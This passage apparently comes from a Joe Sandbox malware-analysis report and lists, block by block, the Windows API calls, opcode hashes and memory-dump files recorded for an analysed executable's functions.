                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Close$ChangeCriticalDeleteFindHandleNotificationSection
                          • String ID:
                          • API String ID: 2515036776-0
                          • Opcode ID: 33e8869870c28eed52a7d2c26f73d7d77f9cc743564de97d0eb4d983e739757a
                          • Instruction ID: 99a2772a898729bf444d1e8af5428a06058af71902aea81b4aa5764ea2f0634b
                          • Opcode Fuzzy Hash: 33e8869870c28eed52a7d2c26f73d7d77f9cc743564de97d0eb4d983e739757a
                          • Instruction Fuzzy Hash: D421E1B1900B49ABC310CF28DC49B5ABBF5FF05730F104319E968977D0D776A9548BA1
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,?), ref: 001FA981
                          • LoadStringW.USER32(00000000,?,?,000001FF), ref: 001FA9AD
                          • FindResourceW.KERNEL32(00000000,?,00000006,?,?,?), ref: 001FA9C4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FindHandleLoadModuleResourceString
                          • String ID:
                          • API String ID: 1126556938-0
                          • Opcode ID: 90dccdb4c2dafb5a67e247e756aac6df67647c1303089d3f333ab5f27c508754
                          • Instruction ID: d964e64ab7f04297a98f29f037ec987a0036e0813037c9e694773fb15fe0d7e7
                          • Opcode Fuzzy Hash: 90dccdb4c2dafb5a67e247e756aac6df67647c1303089d3f333ab5f27c508754
                          • Instruction Fuzzy Hash: 8F1193B5710208ABD7109B759C85BBAB3ACBF54704F40042AA746D7281EBB4DD0587A5
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,Function_000407E7,00000000,00000000,00000000), ref: 00220984
                          • GetLastError.KERNEL32(?,?,?,001F5C9B,00000000,00000000,001F5870,00000000,00000004), ref: 00220990
                          • __dosmaperr.LIBCMT ref: 00220997
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread__dosmaperr
                          • String ID:
                          • API String ID: 2744730728-0
                          • Opcode ID: 9085f229854adce5a7fc1e0e8e40b49dca6ab3050b1584be99e0884a95264f85
                          • Instruction ID: 26324c10af8ba4e639b73cd08b693b6242f457d99d33cca078168b4579a2295b
                          • Opcode Fuzzy Hash: 9085f229854adce5a7fc1e0e8e40b49dca6ab3050b1584be99e0884a95264f85
                          • Instruction Fuzzy Hash: 8301923652122ABBDB159FE1EC85AAF7B69EF80B20F000024F90587113DB718861CBA0
                          APIs
                          • GetDlgItem.USER32(?,000003EE), ref: 001EAB8D
                          • __aulldiv.LIBCMT ref: 001EABD2
                          • PostMessageW.USER32(00000000,00000402,00000000,?), ref: 001EABDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ItemMessagePost__aulldiv
                          • String ID:
                          • API String ID: 1707865492-0
                          • Opcode ID: 4f7fac27db4ad1e7d93a29236e907f4e04164518da59fe6b89f6ad95d2084f35
                          • Instruction ID: 7fa3b12504fc0ca9ddcba126994cb29a2078f78c6475ef36507b1ab2261405f3
                          • Opcode Fuzzy Hash: 4f7fac27db4ad1e7d93a29236e907f4e04164518da59fe6b89f6ad95d2084f35
                          • Instruction Fuzzy Hash: 4AF0BB313107006FE6645615ED8EF7BB7ADDFC4720F14411DBA5A8A190CBB07C408621
                          APIs
                            • Part of subcall function 00222F5E: GetLastError.KERNEL32(?,?,?,00220A4C,0022494F,?,00222F08,00000001,00000364,?,0022080C,00244590,00000010), ref: 00222F63
                            • Part of subcall function 00222F5E: _free.LIBCMT ref: 00222F98
                            • Part of subcall function 00222F5E: SetLastError.KERNEL32(00000000), ref: 00222FCC
                          • ExitThread.KERNEL32 ref: 002208AD
                          • CloseHandle.KERNEL32(?,?,?,002209CD,?,?,00220844,00000000), ref: 002208D5
                          • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,002209CD,?,?,00220844,00000000), ref: 002208EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                          • String ID:
                          • API String ID: 1198197534-0
                          • Opcode ID: 4e6f86cfe28fd892f0efceae50d2d86cf57df1ab0c70c9090885b4b8f951e412
                          • Instruction ID: f342abb5c2927082d58d75d5f9ccc4531f61768ce3e456539b4fe1da4503c369
                          • Opcode Fuzzy Hash: 4e6f86cfe28fd892f0efceae50d2d86cf57df1ab0c70c9090885b4b8f951e412
                          • Instruction Fuzzy Hash: 78F05430410622BBD7255FB5F8CC61737A86F01760B044714F869D29A2D734DC658692
                          APIs
                          • __EH_prolog3_catch_GS.LIBCMT ref: 0020B128
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: H_prolog3_catch_
                          • String ID:
                          • API String ID: 1329019490-3916222277
                          • Opcode ID: cb568bbf97f9d9d353128a3996695b71bfe30df8fde6f4e494bb64a843b95c83
                          • Instruction ID: a1a8e0d0a44ce594fe1fef865cc84eddd61680951c4efbec4638268e1960d037
                          • Opcode Fuzzy Hash: cb568bbf97f9d9d353128a3996695b71bfe30df8fde6f4e494bb64a843b95c83
                          • Instruction Fuzzy Hash: 0B525B71D10659CFCB25DFA9C891AEDB7B1FF54300F248169E41AA7292EB30AD86CF40
                          APIs
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 001F86CF
                          • _wcslen.LIBCMT ref: 001F86ED
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FileNameTemp_wcslen
                          • String ID:
                          • API String ID: 381676680-0
                          • Opcode ID: a235745d75408a8d2d93152f293c4dc19fa143ad2570906cc597075c5a34b256
                          • Instruction ID: bd9c5dadb1f238661052c6177bb46beabf9eae19596bb492ae9854fab76303e7
                          • Opcode Fuzzy Hash: a235745d75408a8d2d93152f293c4dc19fa143ad2570906cc597075c5a34b256
                          • Instruction Fuzzy Hash: 275129725102099BD728EF24DC857BB73D5AF85360F35072DE526C7290EF30D94587A2
                          APIs
                          • SetFilePointer.KERNELBASE(?,?,?,?,?,001FA024,00000000,00000000,00000001,?), ref: 001FA0E5
                          • GetLastError.KERNEL32(?,?,?,?,?,001FA024,00000000,00000000,00000001,?), ref: 001FA0F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: 952b22002f8f977909d0287169e71742c06082f87bf7dd8dbe99211f0634578a
                          • Instruction ID: 1fe8d555dfa1e9368ca8f60ec7716aadbf4ce66a119975e4e3fda8baad500576
                          • Opcode Fuzzy Hash: 952b22002f8f977909d0287169e71742c06082f87bf7dd8dbe99211f0634578a
                          • Instruction Fuzzy Hash: 72012DB55043018FC304EF28D84595BB7E5BF98320F508A0EF4A987291E731E944CB93
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0021B9B5
                            • Part of subcall function 0021D84D: RaiseException.KERNEL32(?,?,?,0021B9D7,?,?,?,?,?,?,?,?,0021B9D7,?,00244410), ref: 0021D8AD
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0021B9D2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID:
                          • API String ID: 3476068407-0
                          • Opcode ID: a54b55821c3177719405bc717cd3e8baec424e3e0757392f499a1b3880949b77
                          • Instruction ID: e865bbd7f76dde77f614fcb9e08f2b9210a757732dcf6bb6a790adb40b8daeb4
                          • Opcode Fuzzy Hash: a54b55821c3177719405bc717cd3e8baec424e3e0757392f499a1b3880949b77
                          • Instruction Fuzzy Hash: EBF0B43483020EB6CB15BEA8EC56ADD77BC5A20350B104230FE28914E1EB70A6B6CDD1
                          APIs
                          • GetLastError.KERNEL32(00244590,00000010), ref: 002207FA
                          • ExitThread.KERNEL32 ref: 00220801
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ErrorExitLastThread
                          • String ID:
                          • API String ID: 1611280651-0
                          • Opcode ID: ba3cf48d528a98c11ffcd1b785d38d034c6dd56b05b0ca3f38ad2966bc1b7953
                          • Instruction ID: e3a98f1d14e275c9893dcf00401e5eb7b1f3ce8dfb0a24d380e4fe49af313469
                          • Opcode Fuzzy Hash: ba3cf48d528a98c11ffcd1b785d38d034c6dd56b05b0ca3f38ad2966bc1b7953
                          • Instruction Fuzzy Hash: C8F0AF70910225FFDB04BFF0E85AA6E3774EF49710F104549F4056B292CB75A960CFA1
                          APIs
                            • Part of subcall function 001E248D: _wcslen.LIBCMT ref: 001E24AD
                            • Part of subcall function 001E248D: _wcslen.LIBCMT ref: 001E24C8
                          • _wcslen.LIBCMT ref: 001FCDC3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID:
                          • API String ID: 176396367-0
                          • Opcode ID: ee6f7c83e9d7d5c62d259d733c15d5134f8a1b8bf9501da2712429b965d723f0
                          • Instruction ID: e77941afc14f7cf6636361939dd0c806daab798121585665ebdaf4502b7dad39
                          • Opcode Fuzzy Hash: ee6f7c83e9d7d5c62d259d733c15d5134f8a1b8bf9501da2712429b965d723f0
                          • Instruction Fuzzy Hash: 2D528D715083858BDB15EF20C491BBFB7E5AFA4300F04096DF98A9B292DF30D949DB92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 91e3340bc1a55ea7e3d225c768c698a0526f141c32dd575e38ad0450bfb0f968
                          • Instruction ID: 6932a322b018fc2a48f2bb361766b872653d026dbedfcd476ec288db43b324b6
                          • Opcode Fuzzy Hash: 91e3340bc1a55ea7e3d225c768c698a0526f141c32dd575e38ad0450bfb0f968
                          • Instruction Fuzzy Hash: 39625E7190025D9FDF24EFA5D891BFDB7B6BF14304F4040AAE60AA7251DB30AA89CF51
                          APIs
                          • __EH_prolog3_catch_GS.LIBCMT ref: 00208F2E
                            • Part of subcall function 0020E8B6: __EH_prolog3_catch.LIBCMT ref: 0020E8BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: H_prolog3_catchH_prolog3_catch_
                          • String ID:
                          • API String ID: 2571662373-0
                          • Opcode ID: 68e647d0f4cb66903d1e6cdb96e7fbac0a879a8106bf63b95d7199897612d040
                          • Instruction ID: 86d681187659c0bf2b9da9a4082238d9d9acd41c8bd11918c5d09b6cb615a6a9
                          • Opcode Fuzzy Hash: 68e647d0f4cb66903d1e6cdb96e7fbac0a879a8106bf63b95d7199897612d040
                          • Instruction Fuzzy Hash: 00417C7091065A9BCB19EFB5C892AEEB775FF24300F204129E406671D3EF30AA45CF90
                          APIs
                          • DeleteObject.GDI32(?), ref: 001E92D9
                            • Part of subcall function 001F5D40: EnterCriticalSection.KERNEL32(?,1FE05385), ref: 001F5D91
                            • Part of subcall function 001F5D40: LeaveCriticalSection.KERNEL32(?,1FE05385), ref: 001F5DB6
                            • Part of subcall function 001F5D40: WaitForSingleObject.KERNEL32(?,00002710,1FE05385), ref: 001F5DCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CriticalObjectSection$DeleteEnterLeaveSingleWait
                          • String ID:
                          • API String ID: 2161630208-0
                          • Opcode ID: 44be12c85f3cfbc24538ccb3a4769c12f8aaaf2a2c235595af75b05e9d439cf9
                          • Instruction ID: b76468050b5561a81d54650b8405987ba721048ba8bf5e05c0520729d4fb1b2c
                          • Opcode Fuzzy Hash: 44be12c85f3cfbc24538ccb3a4769c12f8aaaf2a2c235595af75b05e9d439cf9
                          • Instruction Fuzzy Hash: 82313430300E876BCE09FB72C96ABADB35AAF60744F400128F606575D3EF75AD16C695
                          APIs
                          • CreateSolidBrush.GDI32(00FFFFFF), ref: 001E9102
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: BrushCreateSolid
                          • String ID:
                          • API String ID: 4168422804-0
                          • Opcode ID: ea5485a423cb8bbbfda5ce00cb9c4e5f56446e722aebb39b15d438caa4f71781
                          • Instruction ID: 0e4d2cfae6cdb8de234e2f82d62e52f359a246037050e9457cd0911bf3eb2481
                          • Opcode Fuzzy Hash: ea5485a423cb8bbbfda5ce00cb9c4e5f56446e722aebb39b15d438caa4f71781
                          • Instruction Fuzzy Hash: 3B41C0B5A15B818FC360DF7AC48969BFBE4BF68300F504A2ED4AE87261DB70A044CB15
                          APIs
                          • ShowWindow.USER32(?,00000000), ref: 001E6CDF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 75571d0426f0554264f2b068a4fe202d169142423154c0405d06a7501f9f36c3
                          • Instruction ID: e7fd9c263f003925790d7d70d8e266941673ed4e2e8ae77b1fc6932f3317ed7d
                          • Opcode Fuzzy Hash: 75571d0426f0554264f2b068a4fe202d169142423154c0405d06a7501f9f36c3
                          • Instruction Fuzzy Hash: 62219F71A10659EFCF08DFA5D888BEEB7B8FF18340F408019E845A3181CB74AD54CBA0
                          APIs
                          • SetFileTime.KERNELBASE(?,00000000,00000000,00000000), ref: 00212AD1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FileTime
                          • String ID:
                          • API String ID: 1425588814-0
                          • Opcode ID: d6576b53d66671e47d778956e962baded900ef59316abb96f855673829d67381
                          • Instruction ID: a8110a3b8bd74cef90c3ab422659db700e81dbc04746f062ef7095173c548167
                          • Opcode Fuzzy Hash: d6576b53d66671e47d778956e962baded900ef59316abb96f855673829d67381
                          • Instruction Fuzzy Hash: BD2138B66083069FC314CF69D48095BF7E4FF98714F014A1EF4A9D7240E731E9598B92
                          APIs
                            • Part of subcall function 001ED8B0: FindClose.KERNEL32(001EF7D1,1FE05385,00000000,7FFFFFFE), ref: 001ED773
                            • Part of subcall function 001ED8B0: FindFirstFileW.KERNELBASE(?,00000000,1FE05385,00000000,7FFFFFFE), ref: 001ED7AF
                            • Part of subcall function 001ED8B0: FindFirstFileW.KERNEL32(?,?), ref: 001ED806
                          • FindClose.KERNELBASE(?,00000007), ref: 001ED939
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
